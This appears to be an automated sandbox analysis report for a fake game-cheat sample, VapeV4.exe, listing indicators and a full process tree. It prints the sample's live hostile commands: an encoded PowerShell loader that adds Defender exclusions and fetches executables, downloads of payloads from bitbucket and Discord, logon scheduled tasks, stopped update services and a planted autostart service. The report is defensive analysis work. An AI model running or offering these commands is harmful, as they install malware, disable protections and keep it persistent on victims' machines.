\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\AdvertiseFlags = "388" msiexec.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1236 schtasks.exe 1920 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exe2ene502w.1t51.exeopenwith.exe2ene502w.1t52.exepowershell.exedialer.exepid process 4200 powershell.exe 4200 powershell.exe 1124 powershell.exe 1124 powershell.exe 1808 powershell.exe 1808 powershell.exe 1300 2ene502w.1t51.exe 1300 2ene502w.1t51.exe 4904 openwith.exe 4904 openwith.exe 4904 openwith.exe 4904 openwith.exe 3128 2ene502w.1t52.exe 4648 powershell.exe 4648 powershell.exe 3128 2ene502w.1t52.exe 3128 2ene502w.1t52.exe 3128 2ene502w.1t52.exe 3128 2ene502w.1t52.exe 3128 2ene502w.1t52.exe 3128 2ene502w.1t52.exe 3128 2ene502w.1t52.exe 3128 2ene502w.1t52.exe 3128 2ene502w.1t52.exe 3128 2ene502w.1t52.exe 3128 2ene502w.1t52.exe 3128 2ene502w.1t52.exe 860 dialer.exe 860 dialer.exe 3128 2ene502w.1t52.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe 860 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exe2ene502w.1t52.exedialer.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exesvchost.exesvchost.exedescription pid process Token: SeDebugPrivilege 4200 powershell.exe Token: SeDebugPrivilege 1124 powershell.exe Token: SeDebugPrivilege 1808 powershell.exe Token: SeDebugPrivilege 4648 powershell.exe Token: SeDebugPrivilege 3128 2ene502w.1t52.exe Token: SeDebugPrivilege 860 dialer.exe Token: SeShutdownPrivilege 3952 powercfg.exe Token: SeCreatePagefilePrivilege 3952 powercfg.exe Token: SeShutdownPrivilege 2428 powercfg.exe Token: SeCreatePagefilePrivilege 2428 powercfg.exe Token: SeShutdownPrivilege 4544 powercfg.exe Token: SeCreatePagefilePrivilege 4544 powercfg.exe Token: SeShutdownPrivilege 3592 powercfg.exe Token: SeCreatePagefilePrivilege 3592 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 2256 svchost.exe Token: SeIncreaseQuotaPrivilege 2256 svchost.exe Token: SeSecurityPrivilege 2256 svchost.exe Token: SeTakeOwnershipPrivilege 2256 svchost.exe Token: SeLoadDriverPrivilege 2256 svchost.exe Token: SeSystemtimePrivilege 2256 svchost.exe Token: SeBackupPrivilege 2256 svchost.exe Token: SeRestorePrivilege 2256 svchost.exe Token: SeShutdownPrivilege 2256 svchost.exe Token: SeSystemEnvironmentPrivilege 2256 svchost.exe Token: SeUndockPrivilege 2256 svchost.exe Token: SeManageVolumePrivilege 2256 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2256 svchost.exe Token: SeIncreaseQuotaPrivilege 2256 svchost.exe Token: SeSecurityPrivilege 2256 svchost.exe Token: SeTakeOwnershipPrivilege 2256 svchost.exe Token: SeLoadDriverPrivilege 2256 svchost.exe Token: SeSystemtimePrivilege 2256 svchost.exe Token: SeBackupPrivilege 2256 svchost.exe Token: SeRestorePrivilege 2256 svchost.exe Token: SeShutdownPrivilege 2256 svchost.exe Token: SeSystemEnvironmentPrivilege 2256 svchost.exe Token: SeUndockPrivilege 2256 svchost.exe Token: SeManageVolumePrivilege 2256 svchost.exe Token: SeAuditPrivilege 2740 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2256 svchost.exe Token: SeIncreaseQuotaPrivilege 2256 svchost.exe Token: SeSecurityPrivilege 2256 svchost.exe Token: SeTakeOwnershipPrivilege 2256 svchost.exe Token: SeLoadDriverPrivilege 2256 svchost.exe Token: SeSystemtimePrivilege 2256 svchost.exe Token: SeBackupPrivilege 2256 svchost.exe Token: SeRestorePrivilege 2256 svchost.exe Token: SeShutdownPrivilege 2256 svchost.exe Token: SeSystemEnvironmentPrivilege 2256 svchost.exe Token: SeUndockPrivilege 2256 svchost.exe Token: SeManageVolumePrivilege 2256 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2256 svchost.exe Token: SeIncreaseQuotaPrivilege 2256 svchost.exe Token: SeSecurityPrivilege 2256 svchost.exe Token: SeTakeOwnershipPrivilege 2256 svchost.exe Token: SeLoadDriverPrivilege 2256 svchost.exe Token: SeSystemtimePrivilege 2256 svchost.exe Token: SeBackupPrivilege 2256 svchost.exe Token: SeRestorePrivilege 2256 svchost.exe Token: SeShutdownPrivilege 2256 svchost.exe Token: SeSystemEnvironmentPrivilege 2256 svchost.exe Token: SeUndockPrivilege 2256 svchost.exe Token: SeManageVolumePrivilege 2256 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2256 svchost.exe -
Suspicious use of FindShellTrayWindow 10 IoCs
Processes:
Explorer.EXEpid process 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
VapeV4.exepowershell.exe2ene502w.1t50.exe2ene502w.1t53.execmd.execmd.execmd.execmd.exe2ene502w.1t51.execmd.exe2ene502w.1t52.exedialer.exedescription pid process target process PID 4220 wrote to memory of 4200 4220 VapeV4.exe powershell.exe PID 4220 wrote to memory of 4200 4220 VapeV4.exe powershell.exe PID 4200 wrote to memory of 2780 4200 powershell.exe 2ene502w.1t50.exe PID 4200 wrote to memory of 2780 4200 powershell.exe 2ene502w.1t50.exe PID 4200 wrote to memory of 2780 4200 powershell.exe 2ene502w.1t50.exe PID 4200 wrote to memory of 1300 4200 powershell.exe 2ene502w.1t51.exe PID 4200 wrote to memory of 1300 4200 powershell.exe 2ene502w.1t51.exe PID 4200 wrote to memory of 1300 4200 powershell.exe 2ene502w.1t51.exe PID 4200 wrote to memory of 3128 4200 powershell.exe 2ene502w.1t52.exe PID 4200 wrote to memory of 3128 4200 powershell.exe 2ene502w.1t52.exe PID 4200 wrote to memory of 400 4200 powershell.exe 2ene502w.1t53.exe PID 4200 wrote to memory of 400 4200 powershell.exe 2ene502w.1t53.exe PID 4200 wrote to memory of 400 4200 powershell.exe 2ene502w.1t53.exe PID 2780 wrote to memory of 2832 2780 2ene502w.1t50.exe cmd.exe PID 2780 wrote to memory of 2832 2780 2ene502w.1t50.exe cmd.exe PID 400 wrote to memory of 4900 400 2ene502w.1t53.exe cmd.exe PID 400 wrote to memory of 4900 400 2ene502w.1t53.exe cmd.exe PID 4900 wrote to memory of 4672 4900 cmd.exe where.exe PID 4900 wrote to memory of 4672 4900 cmd.exe where.exe PID 2832 wrote to memory of 4676 2832 cmd.exe chcp.com PID 2832 wrote to memory of 4676 2832 cmd.exe chcp.com PID 4900 wrote to memory of 1124 4900 cmd.exe powershell.exe PID 4900 wrote to memory of 1124 4900 cmd.exe powershell.exe PID 2832 wrote to memory of 3908 2832 cmd.exe findstr.exe PID 2832 wrote to memory of 3908 2832 cmd.exe findstr.exe PID 2832 wrote to memory of 3816 2832 cmd.exe findstr.exe PID 2832 wrote to memory of 3816 2832 cmd.exe findstr.exe PID 2832 wrote to memory of 2940 2832 cmd.exe findstr.exe PID 2832 wrote to memory of 2940 2832 cmd.exe findstr.exe PID 2832 wrote to memory of 1920 2832 cmd.exe schtasks.exe PID 2832 wrote to memory of 1920 2832 cmd.exe schtasks.exe PID 2832 wrote to memory of 1236 2832 cmd.exe schtasks.exe PID 2832 wrote to memory of 1236 2832 cmd.exe schtasks.exe PID 2832 wrote to memory of 4692 2832 cmd.exe cmd.exe PID 2832 wrote to memory of 4692 2832 cmd.exe cmd.exe PID 4692 wrote to memory of 2272 4692 cmd.exe reg.exe PID 4692 wrote to memory of 2272 4692 cmd.exe reg.exe PID 2832 wrote to memory of 3776 2832 cmd.exe cmd.exe PID 2832 wrote to memory of 3776 2832 cmd.exe cmd.exe PID 3776 wrote to memory of 2964 3776 cmd.exe reg.exe PID 3776 wrote to memory of 2964 3776 cmd.exe reg.exe PID 2832 wrote to memory of 1808 2832 cmd.exe powershell.exe PID 2832 wrote to memory of 1808 2832 cmd.exe powershell.exe PID 1300 wrote to memory of 4904 1300 2ene502w.1t51.exe openwith.exe PID 1300 wrote to memory of 4904 1300 2ene502w.1t51.exe openwith.exe PID 1300 wrote to memory of 4904 1300 2ene502w.1t51.exe openwith.exe PID 1300 wrote to memory of 4904 1300 2ene502w.1t51.exe openwith.exe PID 1300 wrote to memory of 4904 1300 2ene502w.1t51.exe openwith.exe PID 4800 wrote to memory of 4880 4800 cmd.exe wusa.exe PID 4800 wrote to memory of 4880 4800 cmd.exe wusa.exe PID 3128 wrote to memory of 860 3128 2ene502w.1t52.exe dialer.exe PID 3128 wrote to memory of 860 3128 2ene502w.1t52.exe dialer.exe PID 3128 wrote to memory of 860 3128 2ene502w.1t52.exe dialer.exe PID 3128 wrote to memory of 860 3128 2ene502w.1t52.exe dialer.exe PID 3128 wrote to memory of 860 3128 2ene502w.1t52.exe dialer.exe PID 3128 wrote to memory of 860 3128 2ene502w.1t52.exe dialer.exe PID 3128 wrote to memory of 860 3128 2ene502w.1t52.exe dialer.exe PID 860 wrote to memory of 616 860 dialer.exe winlogon.exe PID 860 wrote to memory of 668 860 dialer.exe lsass.exe PID 860 wrote to memory of 948 860 dialer.exe svchost.exe PID 860 wrote to memory of 336 860 dialer.exe dwm.exe PID 860 wrote to memory of 392 860 dialer.exe svchost.exe PID 860 wrote to memory of 996 860 dialer.exe svchost.exe PID 860 wrote to memory of 1096 860 dialer.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\VapeV4.exe"C:\Users\Admin\AppData\Local\Temp\VapeV4.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\2ene502w.1t50.exe"C:\Users\Admin\AppData\Roaming\2ene502w.1t50.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B17D.tmp\B17E.tmp\B17F.bat C:\Users\Admin\AppData\Roaming\2ene502w.1t50.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\chcp.comchcp 12516⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "MyBatchScript"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f6⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\2ene502w.1t51.exe"C:\Users\Admin\AppData\Roaming\2ene502w.1t51.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\2ene502w.1t52.exe"C:\Users\Admin\AppData\Roaming\2ene502w.1t52.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "AAWUFTXN"5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"5⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Roaming\2ene502w.1t53.exe"C:\Users\Admin\AppData\Roaming\2ene502w.1t53.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B1FA.tmp\B1FB.tmp\B1FC.bat C:\Users\Admin\AppData\Roaming\2ene502w.1t53.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\where.exewhere node6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exemsiexec /i nodejs-installer.msi /quiet6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\schtasks.exeschtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F6⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
